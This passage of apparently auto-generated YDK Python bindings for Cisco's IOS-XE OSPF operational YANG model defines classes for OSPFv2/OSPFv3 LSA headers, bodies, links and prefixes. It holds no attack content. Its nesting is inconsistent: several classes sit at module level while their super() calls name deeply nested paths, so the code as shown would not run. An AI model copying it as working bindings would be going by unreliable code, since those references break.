                self._children_name_map["ia_router"] = "ia-router"
                self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
                self.lsa_external.parent = self
                self._children_name_map["lsa_external"] = "lsa-external"
                self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
                self.nssa.parent = self
                self._children_name_map["nssa"] = "nssa"
                self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
                self.link_data.parent = self
                self._children_name_map["link_data"] = "link-data"
                self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
                self.ia_prefix.parent = self
                self._children_name_map["ia_prefix"] = "ia-prefix"
                self._segment_path = lambda: "lsa-body"
                self._is_frozen = True
            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
            class Network(Entity):
                """Network-LSA data: attached routers and network option bits."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()
                    self.yang_name = "network"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                        ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
                        ])
                    self.attached_router = []
                    self.lsa_net_options = Bits()
                    self._segment_path = lambda: "network"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
            class Prefix(Entity):
                """Inter-area prefix data: metric, prefix and prefix options."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
                    self.yang_name = "prefix"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                        ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
                        ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
                        ])
                    self.metric = None
                    self.ia_prefix = None
                    self.ia_prefix_options = None
                    self._segment_path = lambda: "prefix"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
            class IaRouter(Entity):
                """Inter-area router data: metric, destination router id and option bits."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
                    self.yang_name = "ia-router"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                        ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
                        ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
                        ])
                    self.metric = None
                    self.destination_router_id = None
                    self.lsa_ia_options = Bits()
                    self._segment_path = lambda: "ia-router"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
            class LsaExternal(Entity):
                """External-LSA data: metric, referenced LS type/id, external prefix and options, forwarding address, route tag, plus a 'flags' child container."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
                    self.yang_name = "lsa-external"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
                    self._leafs = OrderedDict([
                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                        ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                        ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                        ])
                    self.metric = None
                    self.referenced_ls_type = None
                    self.external_prefix = None
                    self.external_prefix_options = None
                    self.forwarding_address = None
                    self.external_route_tag = None
                    self.referenced_link_state_id = None
                    self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
                    self.flags.parent = self
                    self._children_name_map["flags"] = "flags"
                    self._segment_path = lambda: "lsa-external"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                class Flags(Entity):
                    """External-LSA flag bits: single boolean 'e-flag' leaf."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
                        self.yang_name = "flags"
                        self.yang_parent_name = "lsa-external"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                            ])
                        self.e_flag = None
                        self._segment_path = lambda: "flags"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
            class Nssa(Entity):
                """NSSA body wrapper: holds only the 'lsa-nssa-external' child container."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
                    self.yang_name = "nssa"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
                    self._leafs = OrderedDict()
                    self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
                    self.lsa_nssa_external.parent = self
                    self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
                    self._segment_path = lambda: "nssa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    # No settable leafs: the empty whitelist rejects leaf writes.
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
                class LsaNssaExternal(Entity):
                    """NSSA external data: same leaf set as LsaExternal plus a 'flags' child container."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
                        self.yang_name = "lsa-nssa-external"
                        self.yang_parent_name = "nssa"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
                        self._leafs = OrderedDict([
                            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                            ])
                        self.metric = None
                        self.referenced_ls_type = None
                        self.external_prefix = None
                        self.external_prefix_options = None
                        self.forwarding_address = None
                        self.external_route_tag = None
                        self.referenced_link_state_id = None
                        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
                        self.flags.parent = self
                        self._children_name_map["flags"] = "flags"
                        self._segment_path = lambda: "lsa-nssa-external"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                    class Flags(Entity):
                        """NSSA external flag bits: single boolean 'e-flag' leaf."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
                            self.yang_name = "flags"
                            self.yang_parent_name = "lsa-nssa-external"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                ])
                            self.e_flag = None
                            self._segment_path = lambda: "flags"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
            class LinkData(Entity):
                """Link-LSA data: router priority, link-local interface address, prefix count and LSA id option bits."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
                    self.yang_name = "link-data"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
                        ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
                        ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
                        ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
                        ])
                    self.rtr_priority = None
                    self.link_local_interface_address = None
                    self.num_of_prefixes = None
                    self.lsa_id_options = Bits()
                    self._segment_path = lambda: "link-data"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
            class IaPrefix(Entity):
                """Intra-area prefix data: referenced LS type/id, referenced advertising router and prefix count."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
                    self.yang_name = "ia-prefix"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                        ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                        ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                        ])
                    self.referenced_ls_type = None
                    self.referenced_link_state_id = None
                    self.referenced_adv_router = None
                    self.num_of_prefixes = None
                    self._segment_path = lambda: "ia-prefix"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
    """Auto-generated YDK binding for the 'ospfv3-link' YANG list under
    area-scope-lsa, keyed by (interface-id, neighbor-interface-id,
    neighbor-router-id)."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
        self.yang_name = "ospfv3-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list keys, embedded into the XPath segment below.
        self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
            ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
            ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.interface_id = None
        self.neighbor_interface_id = None
        self.neighbor_router_id = None
        self.type = None
        self.metric = None
        # XPath segment with list-key predicates, evaluated lazily so it reflects current key values.
        self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
    """Auto-generated YDK binding for the 'ospfv3-prefix' YANG list under
    area-scope-lsa, keyed by prefix."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
        self.yang_name = "ospfv3-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list key, embedded into the XPath segment below.
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
    """Auto-generated YDK binding for the 'ospfv3-ia-prefix' YANG list under
    area-scope-lsa, keyed by prefix."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
        self.yang_name = "ospfv3-ia-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list key, embedded into the XPath segment below.
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class IntfMultiTopology(Entity):
    """Auto-generated YDK binding for the 'intf-multi-topology' YANG list
    under ospf-interface, keyed by name."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__()
        self.yang_name = "intf-multi-topology"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list key, embedded into the XPath segment below.
        self.ylist_key_names = ['name']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ])
        self.name = None
        self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value)
class AreaScopeLsa(Entity):
    """Auto-generated YDK binding for the 'area-scope-lsa' YANG list under
    ospf-area, keyed by lsa-type. Holds a nested list of per-router LSAs
    (AreaScopeLsa_, defined below in the generated file)."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__()
        self.yang_name = "area-scope-lsa"
        self.yang_parent_name = "ospf-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list key, embedded into the XPath segment below.
        self.ylist_key_names = ['lsa_type']
        # Child YANG node name -> (python attribute, binding class). Note the child
        # list shares the YANG name 'area-scope-lsa'; its class is suffixed with '_'.
        self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))])
        self._leafs = OrderedDict([
            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
        ])
        self.lsa_type = None
        self.area_scope_lsa = YList(self)
        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']"
        # Must stay the final assignment: later writes go through the validating __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value)
class AreaScopeLsa_(Entity):
    """Auto-generated YDK binding for the inner 'area-scope-lsa' YANG list
    (same YANG name as its parent, hence the trailing underscore), keyed by
    (lsa-type, adv-router). Carries the decoded OSPFv2/OSPFv3 LSA containers
    plus the raw LSA bytes."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__()
        self.yang_name = "area-scope-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list keys, embedded into the XPath segment below.
        self.ylist_key_names = ['lsa_type','adv_router']
        # Child YANG node name -> (python attribute, binding class) for every decoded LSA variant.
        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))])
        self._leafs = OrderedDict([
            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
            ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
            ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
            ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
        ])
        self.lsa_type = None
        self.adv_router = None
        self.decoded_completed = None
        self.raw_data = []
        # Singleton child containers: instantiate, back-link parent, and map
        # python attribute -> YANG child name.
        self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa()
        self.ospfv2_lsa.parent = self
        self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
        self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa()
        self.ospfv3_lsa.parent = self
        self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
        # Repeated child lists.
        self.ospfv2_link = YList(self)
        self.ospfv2_topology = YList(self)
        self.ospfv2_external = YList(self)
        self.ospfv3_link = YList(self)
        self.ospfv3_prefix = YList(self)
        self.ospfv3_ia_prefix = YList(self)
        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
        # Must stay the final assignment: later writes go through the validating __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
    """Auto-generated YDK binding for the 'ospfv2-lsa' container under the
    inner area-scope-lsa list: an OSPFv2 LSA split into a header and a body."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__()
        self.yang_name = "ospfv2-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))])
        self._leafs = OrderedDict()
        # Singleton child containers with parent back-links.
        self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"
        self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        self._segment_path = lambda: "ospfv2-lsa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value)

    class Header(Entity):
        """OSPFv2 LSA header fields (age, type, adv-router, seq-num, checksum, ...)."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__()
            self.yang_name = "header"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
            ])
            self.lsa_id = None
            self.opaque_type = None
            self.opaque_id = None
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self.flag_options = Bits()
            self._segment_path = lambda: "header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)

    class LsaBody(Entity):
        """OSPFv2 LSA body: scalar leafs plus a 'network' sub-container."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__()
            self.yang_name = "lsa-body"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
